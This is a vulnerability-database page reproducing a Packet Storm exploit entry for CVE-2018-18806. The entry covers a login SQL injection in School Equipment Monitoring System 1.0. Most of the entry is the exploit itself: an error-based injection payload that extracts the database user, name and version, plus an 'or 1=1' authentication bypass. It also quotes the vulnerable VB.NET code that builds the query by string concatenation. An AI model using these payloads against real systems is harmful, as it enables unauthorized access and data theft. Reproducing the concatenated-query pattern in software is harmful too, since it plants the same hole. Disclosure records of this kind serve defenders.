Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIhsan SencanPACKETSTORM:149996
HistoryOct 29, 2018 - 12:00 a.m.

School Equipment Monitoring System 1.0 SQL Injection

2018-10-2900:00:00
Ihsan Sencan
packetstormsecurity.com
28

0.003 Low

EPSS

Percentile

68.2%

JSON
`# Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection   
# Dork: N/A  
# Date: 2018-10-29  
# Exploit Author: Ihsan Sencan  
# Vendor Homepage: https://www.sourcecodester.com/users/janobe  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip  
# Version: 1.0  
# Category: Windows  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: CVE-2018-18806  
  
# POC:   
# 1)  
  
User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'  
Pass: Null  
  
# POC:   
# 2)  
# User: 'or 1=1 or ''='  
# Pass: Null  
#   
# https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png  
#   
#[PATH]/include/user.vb / 28 / '" & username & "'  
#....  
#24 Public Sub login(ByVal username As Object, ByVal pass As Object)  
#25 Try  
#26   
#27 con.Open()  
#28 reloadtxt("SELECT * FROM `tbluseraccounts` WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')")  
#29   
#30   
#31 If dt.Rows.Count > 0 Then  
#32   
#33 If dt.Rows(0).Item("Role") = "Administrator" Then  
#34 MsgBox("Welcome " & dt.Rows(0).Item("Role"))  
#35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname")  
#36 Form1.LogoutToolStripMenuItem.Text = "Logout"  
#37 visibleMenu("true", "admin")  
#38 LoginForm1.Close()  
#39 Else  
#40 visibleMenu("true", "not admin")  
#41 Form1.LogoutToolStripMenuItem.Text = "Logout"  
#42 LoginForm1.Close()  
#43 End If  
#44   
#45 Else  
#46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information)  
#47 End If  
#48 Catch ex As Exception  
#49 MsgBox(ex.Message)  
#50 End Try  
#51 con.Close()  
#52 da.Dispose()  
#53 End Sub  
#....  
  
`

Related

exploitpack 1
cve 1
nvd 1
prion 1
cvelist 1
exploitdb 1
exploitpack
exploitpack
School Equipment Monitoring System 1.0 - login SQL Injection
2018-10-29 00:00:00
cve
cve
CVE-2018-18806
2018-11-16 18:29:02
nvd
nvd
CVE-2018-18806
2018-11-16 18:29:02
prion
prion
Sql injection
2018-11-16 18:29:00
cvelist
cvelist
CVE-2018-18806
2018-11-16 18:00:00
exploitdb
exploitdb
School Equipment Monitoring System 1.0 - 'login' SQL Injection
2018-10-29 00:00:00

0.003 Low

EPSS

Percentile

68.2%

JSON
Related for PACKETSTORM:149996
exploitpack1cve1nvd1prion1cvelist1exploitdb1